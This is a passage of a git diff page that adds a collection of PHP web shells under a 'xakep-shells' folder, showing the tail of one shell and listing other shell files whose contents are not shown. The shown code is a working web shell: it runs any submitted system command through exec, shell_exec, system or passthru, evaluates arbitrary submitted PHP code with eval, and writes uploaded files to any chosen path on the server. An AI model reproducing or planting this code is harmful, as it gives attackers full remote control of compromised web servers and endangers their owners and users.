</td>
|
||||
</tr>
|
||||
</table>
|
||||
<tr>
|
||||
<td width="100" bgcolor="555555" valign="top">
|
||||
<center>
|
||||
<font face="tahoma" size="1" color="#000000"><div align="center"><b>.::[Shell functions]::.</b></div></font>
|
||||
<font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
|
||||
<table width=100%>
|
||||
<tr>
|
||||
<td style="border: 1 solid #000000" bgcolor="888888" onmouseover="this.style.backgroundColor='#677667';" onmouseout="this.style.backgroundColor='#888888';">
|
||||
<font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
|
||||
<a href="<?php echo $PHP_SELF."?mode=shell"?>" title="./$shell"><b>./ $shell</b></a><br>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<table width=100%>
|
||||
<tr>
|
||||
<td style="border: 1 solid #000000" bgcolor="677667" onmouseover="this.style.backgroundColor='#888888';" onmouseout="this.style.backgroundColor='#677667';">
|
||||
<font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
|
||||
<a href="<?php echo $PHP_SELF."?mode=phpcode"?>" title="PHP code execution">./php execution</a><br>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<table width=100%>
|
||||
<tr>
|
||||
<td style="border: 1 solid #000000" bgcolor="677667" onmouseover="this.style.backgroundColor='#888888';" onmouseout="this.style.backgroundColor='#677667';">
|
||||
<font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
|
||||
<a href="<?php echo $PHP_SELF."?mode=upload"?>" title="Upload file to server">./ upload file</a><br>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
||||
<br>
|
||||
<br>
|
||||
<br>
|
||||
<br>
|
||||
<br>
|
||||
<td bgcolor="555555" valign="top" >
|
||||
<center>
|
||||
<div style="margin-top: 5;">
|
||||
<table width="98%" cellpadding="1" cellspacing="0">
|
||||
<tr>
|
||||
<td style="border: 1 solid #000000" bgcolor="555555" >
|
||||
<font size="1" face="verdana" color="#fcfcfc">
|
||||
<b><?php echo$head_text;?><b>
|
||||
<tr>
|
||||
<td colspan="3" bgcolor="#677667" style="border-left: 1 solid #000000" style="border-bottom: 1 solid #000000" style="border-right: 1 solid #000000">
|
||||
<font face="Verdana" size="2" color="#000000">
|
||||
<br>
|
||||
<?php
|
||||
|
||||
if (!empty($_GET['mode'])) {$mode = $_GET['mode'];}
|
||||
elseif (!empty($_POST['mode'])) {$mode = $_POST['mode'];}
|
||||
else {$mode = "shell";}
|
||||
|
||||
switch($mode) {
|
||||
|
||||
case "shell":
|
||||
$foot_stat="Current directory: <b><font color=#dcdcdc>[".getcwd()."]</font></b></tr>";
|
||||
$head_text="Shell:";
|
||||
chdir($dir);
|
||||
|
||||
function execute($com)
|
||||
{
|
||||
|
||||
if (!empty($com))
|
||||
{
|
||||
if(function_exists('exec'))
|
||||
{
|
||||
exec($com,$arr);
|
||||
echo implode('
|
||||
',$arr);
|
||||
}
|
||||
elseif(function_exists('shell_exec'))
|
||||
{
|
||||
echo shell_exec($com);
|
||||
}
|
||||
elseif(function_exists('system'))
|
||||
{
|
||||
echo system($com);
|
||||
}
|
||||
elseif(function_exists('passthru'))
|
||||
{
|
||||
echo passthru($com);
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
if ($cmd){
|
||||
|
||||
if($sertype == "winda"){
|
||||
ob_start();
|
||||
execute($cmd);
|
||||
$buffer = "";
|
||||
$buffer = ob_get_contents();
|
||||
ob_end_clean();
|
||||
}
|
||||
else{
|
||||
ob_start();
|
||||
echo decode(execute($cmd));
|
||||
$buffer = "";
|
||||
$buffer = ob_get_contents();
|
||||
ob_end_clean();
|
||||
}
|
||||
if (trim($buffer)){
|
||||
echo "<center><table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\">Executed command: <b><font color=#dcdcdc>[$cmd]</font></b></form></td></tr></table></center><left><textarea cols=200 rows=40 style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\">";
|
||||
echo decode($buffer);
|
||||
echo "</textarea></center></div>";
|
||||
}
|
||||
}
|
||||
echo "<table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\">
|
||||
<form action=\"$REQUEST_URI\" method=\"POST\">
|
||||
<table><tr><td><font size=1 face=verdana color=000000>[".get_current_user()."@".$SERVER_NAME."]: </font><INPUT type=\"text\" name=\"cmd\" size=50 value=\"$cmd\" style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td></tr></table>
|
||||
<table><tr><td><font size=1 face=verdana color=000000>Current directory: </font><INPUT type=\"text\" name=\"dir\" size=50 value=\"";
|
||||
echo getcwd();
|
||||
echo "\"style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\">
|
||||
<INPUT type=\"submit\" value=\"Change directory =>\" id=input style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td></tr></table></form></td></tr></table>";
|
||||
break;
|
||||
case "phpcode":
|
||||
$head_text="PHP code execution:";
|
||||
echo "<center><table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\"><b>PHP code:</b></td></tr></table><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=200 rows=40 style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></textarea><br><br>
|
||||
<input type=\"submit\" name=\"submit\" value=\" Execute PHP code => \" id=input style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></form></center></div>";
|
||||
echo "<center><table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\"><center><b>Results of PHP execution:</b></center>";
|
||||
@eval(stripslashes($_POST['phpcode']));
|
||||
echo "</td></tr></table></center>";
|
||||
break;
|
||||
case "upload":
|
||||
echo"<table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\">
|
||||
<table>
|
||||
<font size=\"1\" face=\"verdana\" color=\"#000000\">
|
||||
<form enctype=\"multipart/form-data\" action=\"$self\" method=\"POST\">
|
||||
<input type=\"hidden\" name=\"mode\" value=\"upload\">
|
||||
<tr>
|
||||
<td><font size=\"1\" face=\"verdana\" color=\"#000000\">File:</font></td>
|
||||
<td><input size=\"48\" name=\"file\" type=\"file\" style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td><font size=\"1\" face=\"verdana\" color=\"#000000\">Path:</font></td>
|
||||
<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\" style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"><input type=\"submit\" value=\"Send\" style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td></tr></form></font></table></td></tr></table>";
|
||||
if (isset($_POST['path'])){
|
||||
$uploadfile = $_POST['path'].$_FILES['file']['name'];
|
||||
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
|
||||
echo"<table width=100%><tr><td style=\"border: 1 solid \"000000\" bgcolor=\"888888\"><font size=\"1\" face=\"verdana\" color=\"#000000\">";
|
||||
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
|
||||
echo "File sucessfuly uploaded in to directory: <font color=ffffff>[$uploadfile]</font><br>";
|
||||
echo "Name: <font color=ffffff>[".$_FILES['file']['name']. "]</font><br>";
|
||||
echo "Size: <font color=ffffff>[" .$_FILES['file']['size']. "]</font> Bytes<br>";
|
||||
} else {
|
||||
print "Couldn't to upload file. Information:<br>";
|
||||
print_r($_FILES);
|
||||
}
|
||||
echo"</td></tr></table>";
|
||||
}
|
||||
break;
|
||||
}
|
||||
?>
|
||||
|
||||
</tr>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td style="border: 1 solid #000000" bgcolor="555555" >
|
||||
<font size="1" face="verdana" color="#000000"><?echo $foot_stat;?>
|
||||
<tr>
|
||||
<td style="border: none bgcolor="555555">
|
||||
<font size="1" face="verdana" color="#fcfcfc">
|
||||
<br>
|
||||
<tr>
|
||||
<tr>
|
||||
<td style="border: none bgcolor="555555">
|
||||
<font size="1" face="verdana" color="#fcfcfc">
|
||||
<br>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<table width=950>
|
||||
<tr>
|
||||
<td style="border: 1 solid #000000" bgcolor="677667" >
|
||||
<font size="1" face="verdana" color="#000000">
|
||||
<center>
|
||||
|
||||
<?php
|
||||
echo "-=[".$cshver." | Page generation time: <font color=#fcfcfc>[<b>".round(get_micro_time()-start_time,4). "</b>]</font> seconds.]=-";
|
||||
?>
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</BODY>
|
||||
</HTML>
|
2927
xakep-shells/PHP/ctt_sh.php.php.txt
Normal file
2927
xakep-shells/PHP/ctt_sh.php.php.txt
Normal file
File diff suppressed because it is too large
Load diff
1722
xakep-shells/PHP/cyberlords_sql.php.php.txt
Normal file
1722
xakep-shells/PHP/cyberlords_sql.php.php.txt
Normal file
File diff suppressed because it is too large
Load diff
1033
xakep-shells/PHP/cybershell.php.php.txt
Normal file
1033
xakep-shells/PHP/cybershell.php.php.txt
Normal file
File diff suppressed because it is too large
Load diff
Some files were not shown because too many files have changed in this diff Show more
Loading…
Reference in a new issue